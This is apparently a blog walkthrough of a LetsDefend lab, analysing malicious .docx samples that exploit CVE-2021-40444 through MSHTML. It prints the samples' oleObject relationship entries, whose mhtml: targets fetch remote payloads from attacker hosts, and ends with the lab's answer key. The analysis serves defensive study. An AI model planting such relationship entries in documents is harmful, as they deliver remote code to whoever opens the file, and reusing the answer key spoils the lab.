MSHTML & OOXML (.docx) Analysis
Uncover how attackers exploit .docx files using MSHTML components like mhtml. Learn to analyze .docx structures exposing malicious metadata and payloads.
Hey guys, it's been a minute since I wrote something (busy adult & work life … lol 😅). Anyway, ever wondered how a simple Word document can hide dangerous cyber threats? 🤔 In this blog, I'm discussing my latest research into .docx files and MSHTML exploits, inspired by the LetsDefend MSHTML Challenge. Credits to the creator, Bohan Zhang, a Threat Intelligence Analyst. We'll dive into the sneaky ways attackers exploit .docx files using MSHTML components like mhtml: strings, unpack OOXML structures with tools like zipdump.py, and hunt for malicious metadata/payloads. This one's a bit technical, so grab your coffee and let's get started! ☕💻
Huge shoutout to my buddy d3xt3r for the research support and motivation.
Check out my other blogs for more tips on investigating malicious documents:
Brief
We’re tasked with analyzing four malicious document samples from MalwareBazaar suspected of exploiting a specific vulnerability. The lab involves hunting for suspicious domains and IP addresses.
To download the samples, use one of these hashsums:
➜ md5sum *
45e7d6562bfddb816d45649dd667abde Employee_W2_Form.docx
d5742309ba8146be9eab4396fde77e4e Employees_Contact_Audit_Oct_2021.docx
41dacae2a33ee717abcc8011b705f2cb Work_From_Home_Survey.doc
55998cb43459159a5ed4511f00ff3fc8 income_tax_and_benefit_return_2021.docx
➜ sha256sum *
679bbe0c50754853978a3a583505ebb99bce720cf26a6aaf8be06cd879701ff1 Employee_W2_Form.docx
ed2b9e22aef3e545814519151528b2d11a5e73d1b2119c067e672b653ab6855a Employees_Contact_Audit_Oct_2021.docx
84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69 Work_From_Home_Survey.doc
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 income_tax_and_benefit_return_2021.docx
➜ sha1sum *
00087e46ec0ef6225de59868fd016bd9dd77fa3c Employee_W2_Form.docx
8aaa79ee4a81d02e1023a03aee62a47162a9ff04 Employees_Contact_Audit_Oct_2021.docx
4b35d14a2eab2b3a7e0b40b71955cdd36e06b4b9 Work_From_Home_Survey.doc
9bec2182cc5b41fe8783bb7ab6e577bac5c19f04 income_tax_and_benefit_return_2021.docx
root@ip-172-31-6-252:~/Desktop/ChallengeFiles#
Remember to deal with suspicious files in a sandbox environment.
Let's start by first understanding what DOC and DOCX files are.
What is a DOC & DOCX File?
Simply put:
- A DOCX file is the standard file format for documents created in Microsoft Word, introduced as an upgrade to the older DOC format in 2007. It’s a part of the Office Open XML (OOXML) standard, which uses XML (Extensible Markup Language) to store document content, styles, and other elements. It also uses ZIP compression to keep file sizes small.
- A DOC file is the older Microsoft Word document format, used by versions of Word before 2007. DOC files are based on the OLE2 Compound File Binary (CFB) format, a container that stores information as binary streams. In a DOC file, data is organized as a collection of records and structures arranged in those streams.
In terms of magic bytes, a .docx file starts with 50 4B 03 04 (the ZIP signature).
A .doc file, on the other hand, typically starts with D0 CF 11 E0 A1 B1 1A E1.
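The magic-byte check above can be sketched in a few lines of Python. This is a minimal illustration, not part of the original lab: the function name sniff_container and its return labels are my own, and it only inspects the first 8 bytes, so it says nothing about whether the rest of the file is well formed.

```python
# Leading bytes ("magic numbers") quoted in the text above.
ZIP_MAGIC = bytes.fromhex("504B0304")          # OOXML containers (.docx) are ZIP archives
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .doc compound files


def sniff_container(path):
    """Return 'zip', 'ole', or 'unknown' based on the first 8 bytes of a file.

    Hypothetical helper for illustration; the labels are arbitrary.
    """
    with open(path, "rb") as handle:
        header = handle.read(8)
    if header.startswith(ZIP_MAGIC):
        return "zip"
    if header.startswith(OLE_MAGIC):
        return "ole"
    return "unknown"


# Example call (file name taken from the sample set):
# print(sniff_container("Work_From_Home_Survey.doc"))
```

A check like this is handy because the extension can lie: a file named .doc may still turn out to be a ZIP-based OOXML container.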
Difference between DOC and DOCX
I did a small general comparison for both files:
Characteristics | DOC | DOCX |
---|---|---|
Compatibility | Compatible with older versions of Microsoft Word | Compatible with modern versions of Microsoft Word |
File Extension | .doc | .docx |
File Size | Larger file size due to binary structure | Smaller file size due to better compression and XML format |
File Structure | Binary format, not human-readable | XML-based format, human-readable and machine-readable |
Conversion | Can be converted to DOCX and other formats | Can be converted to other formats and vice versa |
Standardization | Proprietary Microsoft binary format, not an international standard | Based on the ISO/IEC 29500 standard (Office Open XML) |
LAB
To better understand the OOXML structure of .docx files, I created a demo file from scratch called Lab.docx using Microsoft Word, with dummy text. (I plan to experiment with Google Docs or Calibre to compare their .docx structures in a future post.) Let's dive into analyzing Lab.docx to uncover its components and threat potential.
Since a .docx file is essentially a ZIP archive, you can unzip it using tools like unzip or 7zip to reveal its contents for analysis.
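If you would rather stay in Python than reach for unzip or 7zip, the standard zipfile module can list the parts without extracting anything to disk. The sketch below is only an illustration; list_parts is a name I made up, and the 1-based index is just a convenience for referring to parts.

```python
import zipfile


def list_parts(path):
    """Return (index, name, uncompressed_size) for each member of a ZIP-based document.

    Hypothetical helper; nothing is written to disk, the archive is only read.
    """
    with zipfile.ZipFile(path) as archive:
        return [
            (index, info.filename, info.file_size)
            for index, info in enumerate(archive.infolist(), start=1)
        ]


# Example call against the demo file described above:
# for index, name, size in list_parts("Lab.docx"):
#     print(f"{index:>3}  {size:>8}  {name}")
```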
Tools
For folks who love using Linux or web applications for analysis, I'll also be sharing some tools and tricks to use. The DidierStevensSuite by Didier Stevens offers a great collection of scripts for analysis. In this blog, we'll mostly be using the following tools:
- zipdump.py - (ZIP dump utility by Didier Stevens)
- numbers-to-string.py - (Program to convert numbers into a string by Didier Stevens)
- xmldump.py - (This is essentially a wrapper for xml.etree.ElementTree by Didier Stevens)
- re-search.py - (Program to use Python’s re.findall on files by Didier Stevens)
My go-to online analyzer for quick analysis is IRIS-H Digital Forensics (definitely check it out).
Basic Analysis
Continuing with our basic analysis, a document's metadata (what exiftool reports) is critical for a researcher, as it can reveal details like the author, creation date, and application version. These help with:
- Linking the document to a campaign.
- Spotting inconsistencies in document timestamps.
- Discovering potentially embedded data.
In the structure of a .docx file, this metadata is usually stored in two files called docProps/core.xml and docProps/app.xml.
To check the details, simply run the exiftool command against the file in question.
➜ exiftool Lab.docx
ExifTool Version Number : 13.25
File Name : Lab.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2025:06:05 12:44:12+00:00
File Access Date/Time : 2025:06:05 12:44:21+00:00
File Inode Change Date/Time : 2025:06:05 12:44:12+00:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x576f9132
Zip Compressed Size : 358
Zip Uncompressed Size : 1445
Zip File Name : [Content_Types].xml
Title :
Subject :
Creator : Test Author
Keywords :
Description :
Last Modified By : Test Author
Revision Number : 2
Create Date : 2025:06:05 12:36:00Z
Modify Date : 2025:06:05 12:41:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 1
Words : 23
Characters : 134
Application : Microsoft Office Word
Doc Security : None
Lines : 1
Paragraphs : 1
Scale Crop : No
Company :
Links Up To Date : No
Characters With Spaces : 156
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
As a researcher, details such as Creator, Create Date, Application, Modify Date, Pages, Words, and Characters would matter to me, but I'll explain this more later in the blog.
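Most of the document-level fields in that output come straight from docProps/core.xml and docProps/app.xml, so they can also be read without exiftool. The following is a rough sketch using only the standard library; read_doc_props is a hypothetical helper, and it flattens both parts into one dictionary keyed by the bare element name (for example creator or Application), which is a simplification I chose for readability.

```python
import zipfile
import xml.etree.ElementTree as ET


def read_doc_props(path):
    """Collect the leaf elements of docProps/core.xml and docProps/app.xml into a dict.

    Hypothetical helper for illustration; keys are element names without namespace.
    """
    props = {}
    with zipfile.ZipFile(path) as archive:
        names = set(archive.namelist())
        for part in ("docProps/core.xml", "docProps/app.xml"):
            if part not in names:
                continue  # some generators omit one or both parts
            root = ET.fromstring(archive.read(part))
            for element in root.iter():
                text = (element.text or "").strip()
                if len(element) == 0 and text:
                    # Strip the "{namespace}" prefix ElementTree puts on tag names.
                    props[element.tag.rsplit("}", 1)[-1]] = text
    return props


# Example call against the demo file:
# for key, value in read_doc_props("Lab.docx").items():
#     print(f"{key:<20} {value}")
```

As with any parser pointed at untrusted input, run this inside the sandbox rather than on your daily machine.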
Docx Structure
Next, we can use a tool like zipdump.py to list the contents of a ZIP file, as shown:
➜ python3 zipdump.py Lab.docx
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 1980-01-01 00:00:00
2 _rels/.rels 0 1980-01-01 00:00:00
3 word/document.xml 0 1980-01-01 00:00:00
4 word/_rels/document.xml.rels 0 1980-01-01 00:00:00
5 word/theme/theme1.xml 0 1980-01-01 00:00:00
6 word/settings.xml 0 1980-01-01 00:00:00
7 word/numbering.xml 0 1980-01-01 00:00:00
8 word/styles.xml 0 1980-01-01 00:00:00
9 word/webSettings.xml 0 1980-01-01 00:00:00
10 word/fontTable.xml 0 1980-01-01 00:00:00
11 docProps/core.xml 0 1980-01-01 00:00:00
12 docProps/app.xml 0 1980-01-01 00:00:00
Note that each Filename has its own Index number, which is what the -s option selects.
I’ll leave a small cheat sheet here that you can use for further analysis across the blog post
# Examine contents of OOXML file
python3 zipdump.py Lab.docx
# or
python3 zipdump.py -i Lab.docx
# Extract file with specific index `3` from a file to STDOUT.
python3 zipdump.py Lab.docx -s 3 -d
# Extract all files
python3 zipdump.py Lab.docx -D
# Print additional information
python3 zipdump.py Lab.docx -e
Simply explained:
File | Purpose | Malware/Research Relevance |
---|---|---|
[Content_Types].xml | Defines MIME types for all parts in the .docx archive. | Can reveal unexpected file types (e.g., .vbs, .exe, .xml) indicating embedded malicious content. |
_rels/.rels | Links top-level components (e.g., document, metadata). Basically defines relationships to document.xml, core.xml, app.xml. | Malicious relationships may point to external resources (e.g., URLs for C2 servers) , remote OLE objects or scripts. |
word/document.xml | Main document content (text, paragraphs, tables, references to embedded objects). VBA macros are not stored here; macro-enabled files (.docm) keep them in word/vbaProject.bin. | Common target for: - References to embedded or linked OLE objects. - Exploits (e.g., CVE-2017-0199 for remote templates). - Obfuscated content (hidden text, XML bombs). |
word/_rels/document.xml.rels | Links external resources (images, hyperlinks, embedded objects). | Used to: - Load malicious payloads from remote URLs. - Reference embedded exploits (e.g., OLE objects). |
word/theme/theme1.xml | Defines visual styling (colors, fonts). | Rarely abused, but could conceal suspicious objects in obfuscated themes |
word/settings.xml | Document settings (macros, protections, external links, zoom, spell-check). | Critical for: - Enabling macros (attack vector). - Disabling security warnings. - Linking to malicious templates ( attachedTemplate ). |
word/numbering.xml | Defines list formatting (bullets, numbering). | Low risk attack surface |
word/styles.xml | Styles (fonts, spacing, hidden text). | Can be used to: - Hide malicious content (e.g., white text). - Obfuscate script fragments in style names. |
word/webSettings.xml | Configures web view or HTML conversion settings. | Rarely malicious, but may contain odd redirects or URLs. |
word/fontTable.xml | Lists fonts used in the document. | Could reference malicious font files (e.g., CVE-2015-3052 font parsing vulns). |
docProps/core.xml | Stores core metadata (e.g., author, creation date). | Useful for: - Attribution (threat actor fingerprints). - Detecting tampering (e.g., fake timestamps). |
docProps/app.xml | Stores app-specific metadata (e.g., word count, Word version, page count). | May reveal anomalies (e.g., mismatched word counts due to hidden content or weaponized toolkits like CactusTorch). |
Visual Overview:
[Content_Types].xml
- Defines the MIME types (content types) of all the parts within the package. It tells software like Word what kind of data each file contains (e.g., XML, images, etc.).
_rels/.rels
- Contains the root relationships of the document. It points to the key components of the document, such as the main document (word/document.xml) and metadata files (docProps/core.xml and docProps/app.xml).
word/document.xml
- The main file containing the actual content of the document (text, paragraphs, tables, etc.), stored in a structured XML format. For example, the dummy text I put in the document earlier.
word/_rels/document.xml.rels
- Contains relationships for resources referenced in document.xml, such as hyperlinks, images, styles, or external files.
word/theme/theme1.xml
- Defines the color scheme, fonts, and other visual theme elements used in the document.
word/settings.xml
- Stores document-level settings, such as proofing options, zoom level, compatibility settings, and other Word-specific configurations.
word/numbering.xml
- Defines the numbering (bullets and numbering) styles used in lists throughout the document.
word/styles.xml
- Defines the paragraph, character, and table styles used in the document.
word/webSettings.xml
- Stores settings specific to how the document should behave when opened in a web browser or saved as a webpage.
word/fontTable.xml
- Lists all the fonts used in the document, including fallback fonts if the primary font is not available.
docProps/core.xml
- Contains core document properties (metadata) such as title, author, creation/modification dates, and keywords.
docProps/app.xml
- Contains application-specific metadata, such as word count, page count, and other statistics.
Analysis Samples
Now that we have a solid understanding of the structure of a .docx file, we can start analyzing the suspicious files. Using tools like zipdump.py, we can dump their file contents using the following syntax:
python3 zipdump.py Work_From_Home_Survey.doc
python3 zipdump.py Employee_W2_Form.docx
python3 zipdump.py Employees_Contact_Audit_Oct_2021.docx
python3 zipdump.py income_tax_and_benefit_return_2021.docx
Employees_Contact_Audit_Oct_2021.docx
Employee_W2_Form.docx
Work_From_Home_Survey.doc
income_tax_and_benefit_return_2021.docx
I noticed something interesting that all 4 samples have in common in word/_rels/document.xml.rels.
After spending some time examining most of the files in Employee_W2_Form.docx individually, for example, Index 13 (word/_rels/document.xml.rels) piqued my interest.
It contained an interesting string referencing mhtml:, so let's first look at what MSHTML is.
MSHTML
Earlier we talked about a file called word/_rels/document.xml.rels that maps connections between document components and external resources, like links, images, or templates. This file uses XML to define relationships, specifying how parts of the document interact with internal or external content. Now, attackers exploit this structure to embed harmful payloads, often leveraging Microsoft's MSHTML engine (used for rendering HTML in Internet Explorer) to execute remote code or deliver malware.
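Because every relationship that leaves the package is flagged with TargetMode="External", a quick triage step is to list those entries across all .rels parts. Here is a minimal sketch of that idea with the standard library; external_relationships is a hypothetical helper, and an external target is not malicious by itself (ordinary hyperlinks are external too), so treat the output as leads to review.

```python
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by OPC relationship parts (*.rels).
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(path):
    """Return (part, rel_id, rel_type, target) for every External relationship.

    Hypothetical helper for illustration; it reports, it does not judge.
    """
    findings = []
    with zipfile.ZipFile(path) as archive:
        for part in archive.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(part))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the Type URI, e.g. "oleObject".
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((part, rel.get("Id"), rel_type, rel.get("Target")))
    return findings


# Example call against one of the samples:
# for finding in external_relationships("Employee_W2_Form.docx"):
#     print(finding)
```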
document.xml.rels can be exploited in various ways, such as:
- Remote Template Injection
- Embedding Malicious HTML via MSHTML (e.g., CVE-2021-40444)
- Follina Exploit (CVE-2022-30190)
- NoRelationship Attack
Malicious files exploiting MSHTML often involve:
- HTML Files: Typically hosted remotely and referenced in document.xml.rels, these files use JavaScript or ActiveX to exploit MSHTML flaws, executing code or downloading payloads like DLLs or executables.
- Cabinet (.cab) Files: These have been used in attacks like CVE-2021-40444, where a .cab file containing a malicious DLL is fetched via an HTML link in document.xml.rels. The DLL is executed via MSHTML's processing of the .cab file.
- RTF and MHTML Files: Documents can reference RTF or MHTML files that trigger an exploit when rendered. RTF documents were, for example, the delivery vehicle for CVE-2017-8759, which is a .NET Framework flaw rather than an MSHTML one.
Nicolas Krassas (@Dinosn) tweeted a clear PoC for CVE-2021-40444 around September 10, 2021 (the PoC no longer exists):
On CVE-2021-40444, a clear PoC https://t.co/qXMj5pKSg3 which is called via mhmtl element on 'word/_rels/document.xml.rels' of a modified docx file.
— Nicolas Krassas (@Dinosn) September 10, 2021
Analysis Continuation …
Back to Employee_W2_Form.docx, where Index 13 (word/_rels/document.xml.rels) piqued my interest. I noted this interesting string:
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" TargetMode="External"/>
At a high level:
When the .docx file is opened, Word processes the document.xml.rels file and encounters this relationship. The oleObject relationship triggers MSHTML to fetch and render the MHTML file at arsenal.30cm.tw:1212/word.html. The MHTML file may contain JavaScript, ActiveX controls, or a reference to another payload (e.g., a .cab file or DLL), exploiting an MSHTML vulnerability to execute code.
If you care about the tiny details, let's break it down:
- Id="rId6" - a unique identifier assigned to this relationship within the document.
- Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" - the Type attribute specifies the type of relationship, in this case an oleObject. This indicates that the relationship points to an Object Linking and Embedding (OLE) object, which can be an embedded file, external resource, or ActiveX control.
- Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" - the Target attribute specifies the location of the resource being referenced. Here, it points to an external resource using the mhtml protocol, which is associated with MHTML (MIME HTML), a format that combines HTML and its resources into a single file.
  - The URL arsenal.30cm.tw:1212/word.html suggests a remote server (arsenal.30cm.tw) on a non-standard port 1212, hosting a file named word.html.
  - The !x-usc:arsenal.30cm.tw:1212/word.html part is an MHTML-specific syntax, indicating a specific resource within the MHTML archive. The x-usc directive is a Microsoft-specific directive used in MHTML to reference resources within an .mht file or external URLs.
- TargetMode="External" - indicates that the resource is external to the document (i.e., not embedded within the .docx file). Technically this means that the document will attempt to fetch the resource from the specified URL when opened, potentially triggering malicious behavior.
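The breakdown above maps neatly onto a small parser that pulls the network indicator out of a Target value. This is a sketch under my own naming (split_mhtml_target is not from any tool used in this post), and it assumes the target follows the mhtml:<url>!x-usc:<url> shape seen in these samples.

```python
from urllib.parse import urlsplit


def split_mhtml_target(target):
    """Split 'mhtml:<url>!x-usc:<url>' into (outer_url, inner_url, host, port).

    Hypothetical helper; assumes the shape observed in the samples above.
    """
    if not target.lower().startswith("mhtml:"):
        raise ValueError("not an mhtml: target")
    outer, _, inner = target[len("mhtml:"):].partition("!x-usc:")
    # Targets without a scheme (e.g. "arsenal.30cm.tw:1212/word.html") get a
    # leading "//" so urlsplit treats the first segment as host:port.
    parts = urlsplit(outer if "://" in outer else "//" + outer)
    return outer, inner, parts.hostname, parts.port


# Example call with the Target from Employee_W2_Form.docx:
# print(split_mhtml_target(
#     "mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html"
# ))
```

Returning the host and port separately makes it easy to feed the values into whatever IOC list you keep for the investigation.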
Now that we understand that, let's fetch the mhtml targets from the rest of the documents.
Employees_Contact_Audit_Oct_2021.docx
mhtml:http://175.24.190.249/note.html!x-usc:http://175.24.190.249/note.html
income_tax_and_benefit_return_2021.docx
mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html
Work_From_Home_Survey.doc
Things got a little interesting when analyzing Work_From_Home_Survey.doc.
I spotted this obfuscated relationship entry (shown here in its decoded form):
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://trendparlye.com/wiki0509.html!x-usc:http://trendparlye.com/wiki0509.html" TargetMode="External"/>
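The raw obfuscated form of this entry is not reproduced in this post, so the following is an assumption on my part: a common way to hide a Target from plain-text searches is to write it as numeric character references (for example &#109; for m). Under that assumption, Python's html.unescape is enough to get a readable string back. Both function names below are hypothetical, and encode_as_entities exists only to build a test input.

```python
import html


def encode_as_entities(text):
    """Illustration only: rewrite every character as a decimal character reference."""
    return "".join(f"&#{ord(ch)};" for ch in text)


def decode_entities(text):
    """Resolve numeric and named character references back to plain text."""
    return html.unescape(text)


# Example round trip (the encoded value is generated here, not taken from the sample):
# hidden = encode_as_entities("mhtml:http://trendparlye.com/wiki0509.html")
# print(hidden[:30], "...")
# print(decode_entities(hidden))
```

An XML parser resolves such references automatically when it reads the attribute, whereas a plain-text search for mhtml: over the raw file would miss them.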
TO BE CONTINUED …
References
- ISO/IEC 29500 standard (Office Open XML)
- Mshtml - Lolbas
- Trident
- SECURITY ALERT: Microsoft MSHTML Remote Code Execution Vulnerability Office 365 0-Day (CVE-2021-40444) - Trend Micro
- Microsoft Security Advisory (CVE-2021-40444)
- Trend Micro Blog: Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs
- SANS_Analysing_Malicious_Docs_Cheat_Sheet.pdf
- SANS_DFPS_FOR610_v1.4_2503.pdf (Under - Cheat Sheet for Analyzing Malicious Documents)
Questions
Examining the Employees_Contact_Audit_Oct_2021.docx file, what is the malicious IP in the docx file?
175.24.190.249
Examining the Employee_W2_Form.docx file, what is the malicious domain in the docx file?
arsenal.30cm.tw
Examining the Work_From_Home_Survey.doc file, what is the malicious domain in the doc file?
trendparlye.com
Examining the income_tax_and_benefit_return_2021.docx file, what is the malicious domain in the docx file?
hidusi.com
What is the vulnerability the above files exploited?
CVE-2021-40444